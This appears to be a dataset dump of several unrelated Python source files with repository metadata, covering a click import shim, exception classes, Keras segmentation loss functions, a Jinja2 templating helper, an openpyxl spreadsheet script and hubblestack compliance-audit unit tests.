2018-10-01T08:56:14.000Z
|
2020-01-04T19:47:45.000Z
|
pipenv/patched/piptools/click.py
|
Enzime/pipenv
|
d4f710be4a39e09a82a5133b7b3a277ee9bfb13a
|
[
"MIT"
] | 23
|
2020-06-12T08:20:51.000Z
|
2021-06-25T15:38:50.000Z
|
pipenv/patched/piptools/click.py
|
Enzime/pipenv
|
d4f710be4a39e09a82a5133b7b3a277ee9bfb13a
|
[
"MIT"
] | 2
|
2021-11-11T00:36:27.000Z
|
2022-02-09T09:47:35.000Z
|
from __future__ import absolute_import
import click
click.disable_unicode_literals_warning = True
from click import * # noqa
| 18.285714
| 45
| 0.828125
| 17
| 128
| 5.764706
| 0.647059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.140625
| 128
| 6
| 46
| 21.333333
| 0.890909
| 0.03125
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.75
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
298a990acd51aa804f43df5d0fe6aba8751a0203
| 174
|
py
|
Python
|
presalytics/client/presalytics_ooxml_automation/api/__init__.py
|
presalytics/python-client
|
5d80b78562126feeeb49af4738e2c1aed12dce3a
|
[
"MIT"
] | 4
|
2020-02-21T16:30:46.000Z
|
2021-01-12T12:22:03.000Z
|
presalytics/client/presalytics_ooxml_automation/api/__init__.py
|
presalytics/python-client
|
5d80b78562126feeeb49af4738e2c1aed12dce3a
|
[
"MIT"
] | 4
|
2019-12-28T19:30:08.000Z
|
2020-03-31T19:27:45.000Z
|
presalytics/client/presalytics_ooxml_automation/api/__init__.py
|
presalytics/python-client
|
5d80b78562126feeeb49af4738e2c1aed12dce3a
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
# flake8: noqa
# import apis into api package
from presalytics.client.presalytics_ooxml_automation.api.default_api import DefaultApi
| 24.857143
| 86
| 0.850575
| 23
| 174
| 6.086957
| 0.695652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006452
| 0.109195
| 174
| 6
| 87
| 29
| 0.896774
| 0.235632
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
298c110226abdd75deadb65ea8c975dbce7c624b
| 296
|
py
|
Python
|
app/python/scalrpy/exceptions.py
|
unitasglobal/scalr
|
d1b440a46a72c4d30be4db022ba8c0e9ef5c5e73
|
[
"Apache-2.0"
] | 3
|
2017-08-22T17:39:06.000Z
|
2017-12-07T03:49:42.000Z
|
app/python/scalrpy/exceptions.py
|
unitasglobal/scalr
|
d1b440a46a72c4d30be4db022ba8c0e9ef5c5e73
|
[
"Apache-2.0"
] | 1
|
2021-06-01T21:52:44.000Z
|
2021-06-01T21:52:44.000Z
|
app/python/scalrpy/exceptions.py
|
unitasglobal/scalr
|
d1b440a46a72c4d30be4db022ba8c0e9ef5c5e73
|
[
"Apache-2.0"
] | 7
|
2016-09-19T20:36:36.000Z
|
2018-12-04T16:53:41.000Z
|
class IterationTimeoutError(Exception):
pass
class AlreadyRunningError(Exception):
pass
class TimeoutError(Exception):
pass
class MissingCredentialsError(Exception):
pass
class IncompleteCredentialsError(Exception):
pass
class FileNotFoundError(Exception):
pass
| 12.869565
| 44
| 0.763514
| 24
| 296
| 9.416667
| 0.375
| 0.345133
| 0.39823
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175676
| 296
| 22
| 45
| 13.454545
| 0.92623
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
2999a883f713f1345e70adbaeaf1a480cf7e2ab9
| 19
|
py
|
Python
|
EpyModels/__init__.py
|
jamescodella/EpyModels
|
a6f1e637ed6aec761b7050ca9b686c2b3dba4daa
|
[
"MIT"
] | 1
|
2020-03-22T00:44:44.000Z
|
2020-03-22T00:44:44.000Z
|
EpyModels/models/__init__.py
|
jamescodella/EpyModels
|
a6f1e637ed6aec761b7050ca9b686c2b3dba4daa
|
[
"MIT"
] | null | null | null |
EpyModels/models/__init__.py
|
jamescodella/EpyModels
|
a6f1e637ed6aec761b7050ca9b686c2b3dba4daa
|
[
"MIT"
] | null | null | null |
# For python module
| 19
| 19
| 0.789474
| 3
| 19
| 5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.157895
| 19
| 1
| 19
| 19
| 0.9375
| 0.894737
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
29b88fbfd7a5ee3e0e22160733d4e91c2814ea97
| 54
|
py
|
Python
|
feature_encoders/compose/__init__.py
|
hebes-io/feature-encoding
|
741b486a82b346c0354403b6707e105f74012d68
|
[
"Apache-2.0"
] | null | null | null |
feature_encoders/compose/__init__.py
|
hebes-io/feature-encoding
|
741b486a82b346c0354403b6707e105f74012d68
|
[
"Apache-2.0"
] | null | null | null |
feature_encoders/compose/__init__.py
|
hebes-io/feature-encoding
|
741b486a82b346c0354403b6707e105f74012d68
|
[
"Apache-2.0"
] | null | null | null |
from ._compose import FeatureComposer, ModelStructure
| 27
| 53
| 0.87037
| 5
| 54
| 9.2
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092593
| 54
| 1
| 54
| 54
| 0.938776
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
29db1c7e37bc0b1331677ae9483fd531eef8a1bc
| 47
|
py
|
Python
|
Lib/site-packages/micawber/contrib/mcdjango/templatetags/micawber_tags.py
|
Viktor-Teodor/Dreamaftersix
|
69334ed87477c7c340fda5ecb5fe168b51b6c11a
|
[
"MIT"
] | 411
|
2015-01-01T23:39:05.000Z
|
2022-03-21T21:42:57.000Z
|
Lib/site-packages/micawber/contrib/mcdjango/templatetags/micawber_tags.py
|
Viktor-Teodor/Dreamaftersix
|
69334ed87477c7c340fda5ecb5fe168b51b6c11a
|
[
"MIT"
] | 58
|
2015-01-01T12:20:18.000Z
|
2021-07-12T14:05:51.000Z
|
Lib/site-packages/micawber/contrib/mcdjango/templatetags/micawber_tags.py
|
Viktor-Teodor/Dreamaftersix
|
69334ed87477c7c340fda5ecb5fe168b51b6c11a
|
[
"MIT"
] | 70
|
2015-03-19T08:30:12.000Z
|
2022-02-26T22:58:52.000Z
|
from micawber.contrib.mcdjango import register
| 23.5
| 46
| 0.87234
| 6
| 47
| 6.833333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.085106
| 47
| 1
| 47
| 47
| 0.953488
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
29ee8813b240e229865e9a6760ae54b0084d2799
| 1,248
|
py
|
Python
|
tnseg/loss.py
|
suryatejadev/thyroid_segmentation
|
09c291a16f33490757f195057a64acd1ea17bd83
|
[
"MIT"
] | 22
|
2018-12-04T05:46:57.000Z
|
2022-02-09T11:44:28.000Z
|
tnseg/loss.py
|
suryatejadev/thyroid_segmentation
|
09c291a16f33490757f195057a64acd1ea17bd83
|
[
"MIT"
] | 4
|
2019-10-05T01:14:04.000Z
|
2021-11-16T16:19:11.000Z
|
tnseg/loss.py
|
suryatejadev/thyroid_segmentation
|
09c291a16f33490757f195057a64acd1ea17bd83
|
[
"MIT"
] | 9
|
2018-11-01T05:56:04.000Z
|
2021-08-12T14:32:21.000Z
|
from __future__ import division
from keras import backend as K
import numpy as np
import tensorflow as tf
from keras.losses import binary_crossentropy
def dice_coef(y_true, y_pred):
smooth = 1.
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
return (2. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)
def dice_coef_numpy(y_true, y_pred):
smooth = 1.
y_true_f = np.ndarray.flatten(y_true)
y_pred_f = np.ndarray.flatten(y_pred)
intersection = np.sum(y_true_f * y_pred_f)
return (2. * intersection + smooth) / (np.sum(y_true_f) + np.sum(y_pred_f) + smooth)
def bin_crossentropy_loss(y_true, y_pred):
return binary_crossentropy(y_true, y_pred)
def iou_score(y_true, y_pred):
smooth = 1.
y_true_f = K.flatten(y_true)
y_pred_f = K.flatten(y_pred)
intersection = K.sum(y_true_f * y_pred_f)
return (1. * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)
def dice_coef_loss(y_true, y_pred):
return -dice_coef(y_true, y_pred)
def dice_coef_log_loss(y_true, y_pred):
return -K.log(dice_coef(y_true, y_pred))
def iou_score_loss(y_true, y_pred):
return -iou_score(y_true, y_pred)
| 30.439024
| 88
| 0.711538
| 231
| 1,248
| 3.471861
| 0.151515
| 0.143392
| 0.104738
| 0.174564
| 0.753117
| 0.704489
| 0.527431
| 0.438903
| 0.438903
| 0.410224
| 0
| 0.005825
| 0.174679
| 1,248
| 40
| 89
| 31.2
| 0.772816
| 0
| 0
| 0.290323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.225806
| false
| 0
| 0.16129
| 0.129032
| 0.612903
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
4b17400b8c4044ba2cd2e8eac382381c95a506d9
| 4,603
|
py
|
Python
|
objectify/template.py
|
mzpqnxow/mzpqnxow.objectify
|
97cdda6157719ec38d7834a43815abb6c4049a57
|
[
"BSD-3-Clause"
] | null | null | null |
objectify/template.py
|
mzpqnxow/mzpqnxow.objectify
|
97cdda6157719ec38d7834a43815abb6c4049a57
|
[
"BSD-3-Clause"
] | null | null | null |
objectify/template.py
|
mzpqnxow/mzpqnxow.objectify
|
97cdda6157719ec38d7834a43815abb6c4049a57
|
[
"BSD-3-Clause"
] | null | null | null |
"""Provide templating functionality for use in YaML loading"""
from os.path import expanduser
from jinja2 import Template
from objectify.log import error_frame
def _recursive_template(data, template_vars=None, user_path_expand=True):
"""data is an arbitrary data structure, template_vars is a dict
The `data` object is traversed and each instance of a Jinja2 variable
that is found in template_vars is replaced (templated)
This is a recursive function with the end-case being when the object is
a simple string or unicode string type
"""
def _handle_list(data, template_vars):
"""Handle the case where data is a list"""
tmp_list = []
data.reverse()
while data:
item = data.pop()
item = recursive_template(item, template_vars)
tmp_list.append(item)
return tmp_list
def _handle_str(data, template_vars):
"""Handle a simple string value"""
tmpl = Template(data)
data = tmpl.render(template_vars)
if user_path_expand is True:
data = expanduser(data)
return data
def _handle_numeric(data, template_vars):
"""Handle a simple integer type"""
return data
def _handle_dict(data, template_vars):
"""Handle a dict value by going deeper/recursing"""
if isinstance(data, dict):
for key, value in data.items():
data[key] = recursive_template(value, template_vars)
return data
if template_vars is None:
template_vars = {}
elif not isinstance(template_vars, dict):
raise RuntimeError('template_vars must be an instance of dict()')
type_handlers = {
'str': _handle_str,
'dict': _handle_dict,
'OrderedDict': _handle_dict,
'list': _handle_list,
'int': _handle_numeric,
'float': _handle_numeric
}
handler_key = type(data).__name__
handler = type_handlers[handler_key]
return handler(data, template_vars)
error_frame('unexpected and unsupported type "{}" encountered'.format(
type(data)))
raise RuntimeError('unable to template object')
def recursive_template(data, template_vars=None, user_path_expand=True):
"""data is an arbitrary data structure, template_vars is a dict
The `data` object is traversed and each instance of a Jinja2 variable
that is found in template_vars is replaced (templated)
This is a recursive function with the end-case being when the object is
a simple string or unicode string type
"""
# These conditionals can be cleaned up a little bit
# Note there is no use for `elif` because each block returns making
# the `else` implied
# def _handle_list(data, template_vars):
# tmp_list = []
# data.reverse()
# while data:
# item = data.pop()
# item = recursive_template(item, template_vars)
# tmp_list.append(item)
# return tmp_list
# def _handle_str(data, template_vars, user_path_expand=user_path_expand):
# tmpl = Template(data)
# data = tmpl.render(template_vars)
# if user_path_expand is True:
# data = expanduser(data)
# return data
# def _handle_numeric(data):
# return data
# def _handle_dict(data, template_vars):
# if isinstance(data, dict):
# for key, value in data.items():
# data[key] = recursive_template(value, template_vars)
# return data
if template_vars is None:
template_vars = {}
elif not isinstance(template_vars, dict):
raise RuntimeError('template_vars must be an instance of dict()')
if isinstance(data, str):
tmpl = Template(data)
data = tmpl.render(template_vars)
if user_path_expand is True:
data = expanduser(data)
return data
if isinstance(data, dict):
for key, value in data.items():
data[key] = recursive_template(value, template_vars)
return data
if isinstance(data, list):
# Not supporting sets and tuples since YaML doesn't support them
tmp_list = []
data.reverse()
while data:
item = data.pop()
item = recursive_template(item, template_vars)
tmp_list.append(item)
return tmp_list
if isinstance(data, (int, float)):
return data
error_frame('unexpected and unsupported type "{}" encountered'.format(
type(data)))
raise RuntimeError('unable to template object')
| 32.188811
| 78
| 0.638497
| 576
| 4,603
| 4.925347
| 0.213542
| 0.131124
| 0.056398
| 0.031019
| 0.773
| 0.765597
| 0.731759
| 0.731759
| 0.704265
| 0.704265
| 0
| 0.000904
| 0.279166
| 4,603
| 142
| 79
| 32.415493
| 0.854129
| 0.363459
| 0
| 0.676056
| 0
| 0
| 0.092645
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.084507
| false
| 0
| 0.042254
| 0
| 0.253521
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
d99b25f6b5e57c4d144daee9fd24df594365ceca
| 4,393
|
py
|
Python
|
aalh_iit_miltonzinkcollection/populate-format-extent-columns.py
|
johndewees/iitmigration
|
4dadfbecda719d6e7d60af076a231aedec3c862f
|
[
"Unlicense"
] | null | null | null |
aalh_iit_miltonzinkcollection/populate-format-extent-columns.py
|
johndewees/iitmigration
|
4dadfbecda719d6e7d60af076a231aedec3c862f
|
[
"Unlicense"
] | null | null | null |
aalh_iit_miltonzinkcollection/populate-format-extent-columns.py
|
johndewees/iitmigration
|
4dadfbecda719d6e7d60af076a231aedec3c862f
|
[
"Unlicense"
] | null | null | null |
from openpyxl import load_workbook
filename = 'aalh_iit_miltonzinkcollection.xlsx'
wb = load_workbook(filename)
ws = wb['Metadata Template']
minimumcol = 47
maximumcol = 47
minimumrow = 7
maximumrow = 790
iterationrow = 7
targetcol = 47
formatcol = 33
extentcol = 34
for row in ws.iter_rows(min_row=minimumrow, min_col=minimumcol, max_row=maximumrow, max_col=maximumcol):
for cell in row:
print(iterationrow)
formatvar = ws.cell(row=iterationrow, column=targetcol).value
print(formatvar)
if formatvar == None:
print('FIELD = NONE')
elif formatvar.find('Negative') != -1:
ws.cell(row=iterationrow, column=formatcol).value = 'Picture; Negatives'
print(ws.cell(row=iterationrow, column=formatcol).value)
elif formatvar.find('negative') != -1:
ws.cell(row=iterationrow, column=formatcol).value = 'Picture; Negatives'
print(ws.cell(row=iterationrow, column=formatcol).value)
elif formatvar.find('Slide') != -1:
ws.cell(row=iterationrow, column=formatcol).value = 'Picture; Slides'
print(ws.cell(row=iterationrow, column=formatcol).value)
elif formatvar.find('slide') != -1:
ws.cell(row=iterationrow, column=formatcol).value = 'Picture; Slides'
print(ws.cell(row=iterationrow, column=formatcol).value)
elif formatvar.find('Post') != -1:
ws.cell(row=iterationrow, column=formatcol).value = 'Picture; Postcard'
print(ws.cell(row=iterationrow, column=formatcol).value)
elif formatvar.find('post') != -1:
ws.cell(row=iterationrow, column=formatcol).value = 'Picture; Postcard'
print(ws.cell(row=iterationrow, column=formatcol).value)
elif formatvar.find('Draw') != -1:
ws.cell(row=iterationrow, column=formatcol).value = 'Picture; Drawings'
print(ws.cell(row=iterationrow, column=formatcol).value)
elif formatvar.find('draw') != -1:
ws.cell(row=iterationrow, column=formatcol).value = 'Picture; Drawings'
print(ws.cell(row=iterationrow, column=formatcol).value)
elif formatvar.find('Black') != -1:
ws.cell(row=iterationrow, column=formatcol).value = 'Picture; Black and white photograph'
print(ws.cell(row=iterationrow, column=formatcol).value)
elif formatvar.find('black') != -1:
ws.cell(row=iterationrow, column=formatcol).value = 'Picture; Black and white photograph'
print(ws.cell(row=iterationrow, column=formatcol).value)
elif formatvar.find('b&w') != -1:
ws.cell(row=iterationrow, column=formatcol).value = 'Picture; Black and white photograph'
print(ws.cell(row=iterationrow, column=formatcol).value)
elif formatvar.find('B&W') != -1:
ws.cell(row=iterationrow, column=formatcol).value = 'Picture; Black and white photograph'
print(ws.cell(row=iterationrow, column=formatcol).value)
elif formatvar.find('Color') != -1:
ws.cell(row=iterationrow, column=formatcol).value = 'Picture; Color photograph'
print(ws.cell(row=iterationrow, column=formatcol).value)
elif formatvar.find('color') != -1:
ws.cell(row=iterationrow, column=formatcol).value = 'Picture; Color photograph'
print(ws.cell(row=iterationrow, column=formatcol).value)
else :
ws.cell(row=iterationrow, column=formatcol).value = 'Picture'
print(ws.cell(row=iterationrow, column=formatcol).value)
for cell in row:
extentvar = ws.cell(row=iterationrow, column=targetcol).value
if extentvar == None:
print('FIELD = NONE')
elif extentvar != None:
extentvar1 = extentvar.split(';')
for item in extentvar1:
if item.find('Ex') != -1:
extentvar2 = item
extentvar3 = extentvar2.replace('Extent: ','')
extentvar4 = extentvar3.strip()
ws.cell(row=iterationrow, column=extentcol).value = extentvar4
print(extentvar4)
else :
print('EXTENT = CONFUSING')
iterationrow = iterationrow + 1
wb.save('aalh_iit_miltonzinkcollection.xlsx')
| 51.682353
| 105
| 0.620077
| 480
| 4,393
| 5.652083
| 0.158333
| 0.072982
| 0.109473
| 0.255437
| 0.759676
| 0.73498
| 0.73498
| 0.704755
| 0.670107
| 0.670107
| 0
| 0.012195
| 0.253358
| 4,393
| 85
| 106
| 51.682353
| 0.814939
| 0
| 0
| 0.432099
| 0
| 0
| 0.124594
| 0.015777
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.012346
| 0
| 0.012346
| 0.259259
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
d99cea38daebed49418d98310f55405bd38bad63
| 6,599
|
py
|
Python
|
tests/unittests/test_pkg_nova.py
|
praksinha/hubble
|
54062cf07bf2462ea9be149d740f38defd849b25
|
[
"Apache-2.0"
] | 2
|
2019-11-30T19:36:25.000Z
|
2020-09-23T06:28:26.000Z
|
tests/unittests/test_pkg_nova.py
|
praksinha/hubble
|
54062cf07bf2462ea9be149d740f38defd849b25
|
[
"Apache-2.0"
] | 3
|
2020-08-03T18:14:02.000Z
|
2020-08-03T22:43:44.000Z
|
tests/unittests/test_pkg_nova.py
|
praksinha/hubble
|
54062cf07bf2462ea9be149d740f38defd849b25
|
[
"Apache-2.0"
] | null | null | null |
import os
import hubblestack.files.hubblestack_nova.pkg
class TestPkg():
def test_virtual(self):
expected_val = True
val = hubblestack.files.hubblestack_nova.pkg.__virtual__()
assert expected_val == val
def test_merge_yaml(self):
ret = {'pkg': {}}
data = {'pkg':
{'blacklist': {'talk': {'data': {'Ubuntu-16.04': [{'/etc/inetd.conf': {'pattern': '^talk', 'tag': 'CIS-5.1.4'}}, {'/etc/inetd.conf': {'pattern': '^ntalk', 'tag': 'CIS-5.1.4'}}]}, 'description': 'Ensure talk server is not enabled'}},
'whitelist': {'ssh_ignore_rhosts': {'data': {'Ubuntu-16.04': [{'/etc/ssh/sshd_config': {'pattern': 'IgnoreRhosts', 'tag': 'CIS-9.3.6', 'match_output': 'yes'}}]}, 'description': 'Set SSH IgnoreRhosts to Yes'}}}}
profile = 'ubuntu-1604-level-1-scored-v1-0-0'
val = hubblestack.files.hubblestack_nova.pkg._merge_yaml(ret, data, profile)
assert val['pkg'] == {'blacklist': [{'talk': {'nova_profile': 'ubuntu-1604-level-1-scored-v1-0-0', 'data': {'Ubuntu-16.04': [{'/etc/inetd.conf': {'pattern': '^talk', 'tag': 'CIS-5.1.4'}}, {'/etc/inetd.conf': {'pattern': '^ntalk', 'tag': 'CIS-5.1.4'}}]}, 'description': 'Ensure talk server is not enabled'}}],
'whitelist': [{'ssh_ignore_rhosts': {'nova_profile': 'ubuntu-1604-level-1-scored-v1-0-0', 'data': {'Ubuntu-16.04': [{'/etc/ssh/sshd_config': {'pattern': 'IgnoreRhosts', 'tag': 'CIS-9.3.6', 'match_output': 'yes'}}]}, 'description': 'Set SSH IgnoreRhosts to Yes'}}]}
def test_merge_yaml_recurssive(self):
ret = {}
profile = 'ubuntu-1604-level-1-scored-v1-0-0'
data1 = {'pkg':
{'blacklist': {'talk1': {'data': {'Ubuntu-16.04': [{'/etc/inetd.conf': {'pattern': '^talk', 'tag': 'CIS-5.1.4'}}, {'/etc/inetd.conf': {'pattern': '^ntalk', 'tag': 'CIS-5.1.4'}}]}, 'description': 'Ensure talk server is not enabled'}},
'whitelist': {'ssh_ignore_rhosts': {'data': {'Ubuntu-16.04': [{'/etc/ssh/sshd_config': {'pattern': 'IgnoreRhosts', 'tag': 'CIS-9.3.6', 'match_output': 'yes'}}]}, 'description': 'Set SSH IgnoreRhosts to Yes'}}}}
data2 = {'pkg':
{'blacklist': {'talk2': {'data': {'Ubuntu-16.04': [{'/etc/inetd.conf': {'pattern': '^talk', 'tag': 'CIS-5.1.4'}}, {'/etc/inetd.conf': {'pattern': '^ntalk', 'tag': 'CIS-5.1.4'}}]}, 'description': 'Ensure talk server is not enabled'}}}}
data_list = [data1, data2]
for data in data_list:
val = hubblestack.files.hubblestack_nova.pkg._merge_yaml(ret, data, profile)
assert (len(val['pkg']['blacklist'])) == 2
def test_audit_for_success(self):
val = {}
data_list = [('ubuntu-1604-level-1-scored-v1-0-0',
{'pkg':
{'blacklist': {'prelink': {'nova_profile': 'ubuntu-1604-level-1-scored-v1-0-0', 'data': {'Ubuntu-16.04': [{'prelink': 'CIS-4.4'}]}, 'description': 'Disable Prelink'}, 'nis': {'nova_profile': 'ubuntu-1604-level-1-scored-v1-0-0', 'data': {'Ubuntu-16.04': [{'nis': 'CIS-5.1.1'}]}, 'description': 'Ensure NIS is not installed'}},
'whitelist': {'ntp': {'nova_profile': 'ubuntu-1604-level-1-scored-v1-0-0', 'data': {'Ubuntu-16.04': [{'ntp': 'CIS-6.5'}]}, 'description': 'Configure Network Time Protocol (NTP)'}, 'rsyslog': {'nova_profile': 'ubuntu-1604-level-1-scored-v1-0-0', 'data': {'Ubuntu-16.04': [{'rsyslog': 'CIS-8.2.1'}]}, 'description': 'Install the rsyslog package'}}}})]
__tags__ = 'CIS-6.5'
hubblestack.files.hubblestack_nova.pkg.__grains__ = {'osfinger': 'Ubuntu-16.04'}
__salt__ = {}
def pkg_version(name):
return name
__salt__['pkg.version'] = pkg_version
hubblestack.files.hubblestack_nova.pkg.__salt__ = __salt__
val = hubblestack.files.hubblestack_nova.pkg.audit(data_list, __tags__, [], debug=False)
assert len(val['Success']) != 0
assert len(val['Failure']) == 0
def test_audit_for_incorrect_input(self):
val = {}
data_list = []
__tags__ = 'wrong_test_data'
hubblestack.files.hubblestack_nova.pkg.__grains__ = {'osfinger': 'Ubuntu-16.04'}
__salt__ = {}
expected_val = {'Failure': [], 'Controlled': [], 'Success': []}
def pkg_version(name):
return name
__salt__['pkg.version'] = pkg_version
hubblestack.files.hubblestack_nova.pkg.__salt__ = __salt__
val = hubblestack.files.hubblestack_nova.pkg.audit(data_list, __tags__, [], debug=False)
assert val == expected_val
def test_audit_for_value_error(self):
val = {}
data_list = 'wrong_test_data'
__tags__ = 'CIS-6.5'
hubblestack.files.hubblestack_nova.pkg.__grains__ = {'osfinger': 'Ubuntu-16.04'}
__salt__ = {}
def pkg_version(name):
return name
__salt__['pkg.version'] = pkg_version
hubblestack.files.hubblestack_nova.pkg.__salt__ = __salt__
try:
val = hubblestack.files.hubblestack_nova.pkg.audit(data_list, __tags__, [], debug=False)
except ValueError:
pass
def test_get_tags(self):
hubblestack.files.hubblestack_nova.pkg.__grains__ = {'osfinger': 'Ubuntu-16.04'}
data = {'pkg':
{'blacklist': [{'talk1': {'nova_profile': 'ubuntu-1604-level-1-scored-v1-0-0', 'data': {'Ubuntu-16.04': [{'/etc/inetd.conf': {'pattern': '^talk', 'tag': 'CIS-5.1.4'}}, {'/etc/inetd.conf': {'pattern': '^ntalk', 'tag': 'CIS-5.1.4'}}]}, 'description': 'Ensure talk server is not enabled'}},
{'talk2': {'nova_profile': 'ubuntu-1604-level-1-scored-v1-0-0', 'data': {'Ubuntu-16.04': [{'/etc/inetd.conf': {'pattern': '^talk', 'tag': 'CIS-5.1.4'}}, {'/etc/inetd.conf': {'pattern': '^ntalk', 'tag': 'CIS-5.1.4'}}]}, 'description': 'Ensure talk server is not enabled'}}],
'whitelist': [{'ssh_ignore_rhosts': {'nova_profile': 'ubuntu-1604-level-1-scored-v1-0-0', 'data': {'Ubuntu-16.04': [{'/etc/ssh/sshd_config': {'pattern': 'IgnoreRhosts', 'tag': 'CIS-9.3.6', 'match_output': 'yes'}}]}, 'description': 'Set SSH IgnoreRhosts to Yes'}}]}}
val = hubblestack.files.hubblestack_nova.pkg._get_tags(data)
assert val['CIS-5.1.4'] != 0
assert val['CIS-9.3.6'] != 0
def test_get_tags_for_empty_data(self):
data = {'pkg': {}}
hubblestack.files.hubblestack_nova.pkg.__grains__ = {'osfinger': 'Ubuntu-16.04'}
ret = hubblestack.files.hubblestack_nova.pkg._get_tags(data)
assert ret == {}
| 66.656566
| 372
| 0.588422
| 835
| 6,599
| 4.420359
| 0.131737
| 0.041181
| 0.051477
| 0.14278
| 0.764021
| 0.754809
| 0.743972
| 0.743972
| 0.736928
| 0.691412
| 0
| 0.047709
| 0.196393
| 6,599
| 98
| 373
| 67.336735
| 0.648312
| 0
| 0
| 0.423529
| 0
| 0
| 0.38915
| 0.060009
| 0
| 0
| 0
| 0
| 0.105882
| 1
| 0.129412
| false
| 0.011765
| 0.023529
| 0.035294
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
d9f7d2e34d2410d7ca09d8e02a2378fb46228fd4
| 140
|
py
|
Python
|
src/core/__init__.py
|
sssr-dev/api-server
|
0647aa56b948b0df4a6f50c34727606156e228d4
|
[
"Apache-2.0"
] | 2
|
2022-03-15T23:30:58.000Z
|
2022-03-18T15:28:46.000Z
|
src/core/__init__.py
|
sssr-dev/api-server
|
0647aa56b948b0df4a6f50c34727606156e228d4
|
[
"Apache-2.0"
] | null | null | null |
src/core/__init__.py
|
sssr-dev/api-server
|
0647aa56b948b0df4a6f50c34727606156e228d4
|
[
"Apache-2.0"
] | null | null | null |
from .init_system import InitSystem, Storage
from .Responses import Responses
from .DBHelp import DBHelp
from .Endpoint import Endpoint
| 28
| 45
